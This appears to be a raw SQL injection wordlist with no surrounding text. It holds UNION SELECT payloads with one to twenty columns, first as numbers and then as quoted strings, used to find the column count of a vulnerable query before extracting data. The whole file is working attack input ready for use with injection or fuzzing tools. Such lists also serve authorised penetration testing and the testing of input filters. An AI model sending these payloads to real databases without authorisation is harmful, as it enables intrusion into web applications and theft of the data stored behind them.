UNION SELECT 1
UNION SELECT 1,2
UNION SELECT 1,2,3
UNION SELECT 1,2,3
UNION SELECT 1,2,3,4
UNION SELECT 1,2,3,4,5
UNION SELECT 1,2,3,4,5,6
UNION SELECT 1,2,3,4,5,6,7
UNION SELECT 1,2,3,4,5,6,7,8
UNION SELECT 1,2,3,4,5,6,7,8,9
UNION SELECT 1,2,3,4,5,6,7,8,9,10
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION SELECT '1'
UNION SELECT '1','2'
UNION SELECT '1','2','3'
UNION SELECT '1','2','3','4'
UNION SELECT '1','2','3','4','5'
UNION SELECT '1','2','3','4','5','6'
UNION SELECT '1','2','3','4','5','6','7'
UNION SELECT '1','2','3','4','5','6','7','8'
UNION SELECT '1','2','3','4','5','6','7','8','9'
UNION SELECT '1','2','3','4','5','6','7','8','9','10'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19'
UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20'